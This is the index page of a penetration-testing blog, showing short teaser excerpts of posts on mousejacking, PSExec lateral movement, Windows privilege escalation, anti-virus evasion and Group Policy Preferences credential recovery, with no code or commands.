To Shell And Back: Adventures In Pentesting
  • Home
  • Posts
    • Peripheral Pwnage
    • *Puff* *Puff* PSExec
    • Well, That Escalated Quickly…
    • A/V Ain’t Got Nothing On Me!
    • What You Know Bout GPP???
  • About Me
  • Home
  • Posts
    • Peripheral Pwnage
    • *Puff* *Puff* PSExec
    • Well, That Escalated Quickly…
    • A/V Ain’t Got Nothing On Me!
    • What You Know Bout GPP???
  • About Me
Jonathan

Jonathan

@icanhazshell

  • Authors
  • All
  • Jonathan
16th August 2017
Wireless

Peripheral Pwnage

Hostile Airwaves: Mousejacking On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials.  While this approach has worked on many clients, what if Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NTB-NS) protocols are configured securely or disabled?  Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold?

There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces.  One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals.  This technique, known as “mousejacking”, involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the receiving USB dongle.  This is made possible because many wireless mice (and a handful of keyboards) either don’t use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized. Let’s explore…

  • Read More
  • 2
  • 763
11th February 2017
Lateral Movement

*Puff* *Puff* PSExec

Lateral Movement: An Overview

Regardless of the method utilized for gaining the initial foothold, penetration testers are often looking for ways to move around the client’s network (referred to as lateral movement or lateral spread).  Other machines may hold goodies that further the engagement, whether it is documents that contain the company’s “crown jewels” or stored credentials that give access to databases, Domain Controllers, or other important assets.  

While there is an art to gaining situational awareness and understanding the “lay of the land” once the initial foothold is established, this article will instead focus on a subset of tools and techniques for moving around the victim’s Windows environment.

  • Read More
  • 3
  • 739
24th November 2015
Privilege Escalation

Well, That Escalated Quickly…

Common Windows Privilege Escalation Vectors

Imagine this scenario:  You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful?  Should you throw in the towel? Only if you’re a quitter… but you’re not, are you?  You’re a champion!!!  🙂

In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules.  While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances.

  • Read More
  • 17
  • 787
30th September 2015
Anti Virus

A/V Ain’t Got Nothing On Me!

Anti-Virus Vendors vs. Penetration Testers

While Metasploit is a great framework for conducting penetration tests, it’s popularity hasn’t gone unnoticed by anti-virus (a/v) vendors.  Standard Metasploit payload executables started getting flagged by a/v products in 2009 and now are picked up by a majority of a/v products out on the market.  If you can’t get your payload past your clients’s a/v software, you just might find yourself dead in the water before you’ve even begun.

The problem is that professional malware writers, organized crime, and nation state actors have no problem breezing past a/v software, successfully bypassing these solutions for years.  We, as penetration testers, are finding ourselves getting flagged because we are utilizing popular tools that are well-known to a/v vendors.  In this post, we will explore the topic of a/v evasion.

  • Read More
  • 7
  • 670
30th August 2015
Lateral Movement

What You Know Bout GPP???

Privilege Escalation Via Group Policy Preferences (GPP)

While this is not a new topic in the penetration testing world by any means [Chris Gates (@carnal0wnage) and others were speaking about this way back in 2012], it is still prevalent across many networks today.  It’s important enough to talk about because it is “low-hanging fruit” for pentesters (and hackers) and often one of the first things checked for after an initial foothold into a network, as it can quickly allow for escalation to Local Administrator and lateral movement.  At that point, it often is just a matter of time before complete Domain compromise.

In this post we will explore the Windows Active Directory feature, Group Policy Preferences (GPP), that was introduced with Server 2008 and how we can exploit this feature to obtain cleartext credentials for privileged accounts in the Domain.

  • Read More
  • 6
  • 681
28th August 2015
Uncategorized

It’s Getting Hot In The Lab…

The past couple days I’ve been building out the lab that will be utilized for a lot of my tool demonstrations and exploit walkthroughs presented on this blog.  The setup is beautifully simple: a Windows Active Directory Domain environment with several connected workstations of various O/S versions and patch status.  This lab will at least vaguely mimic some key aspects of a typical corporate Windows environment and will allow for lateral movement and privilege escalation scenarios across the Domain. As you’ll quickly notice upon reviewing the listing of lab machines below, there is a definite theme to this blog (got […]

  • Read More
  • 2
  • 633
27th August 2015
Uncategorized

whoami

Welcome to my new blog!  The intent of this page is to post on security issues that I’m researching or witness during penetration testing engagements.  I hope this page will serve as a reference for other penetration testers as well as system administrators (as I will often propose mitigation strategies for issues presented).  Please feel free to leave any constructive feedback as I begin posting. About Me: I’m an penetration tester who got his start as a government employee working for the Department of Defense (DOD) in a five-sided building.  During this time, I got hands-on experience building, growing and “selling” proactive security […]

  • Read More
  • 3
  • 686
No More Articles

Social Media


Recent Posts


  • Peripheral Pwnage
  • *Puff* *Puff* PSExec
  • Well, That Escalated Quickly…
  • A/V Ain’t Got Nothing On Me!
  • What You Know Bout GPP???

Archives


  • August 2017
  • February 2017
  • November 2015
  • September 2015
  • August 2015

Categories


  • Anti Virus
  • Lateral Movement
  • PowerShell
  • Privilege Escalation
  • Uncategorized
  • Windows
  • Wireless

Read More
To Shell And Back: Adventures In Pentesting

Archives


  • August 2017
  • February 2017
  • November 2015
  • September 2015
  • August 2015

Categories


Anti Virus Lateral Movement PowerShell Privilege Escalation Uncategorized Windows Wireless

Copyright © To Shell And Back: Adventures In Pentesting. 2023 • All rights reserved.

Onyx WordPress Theme by EckoThemes. Published with WordPress.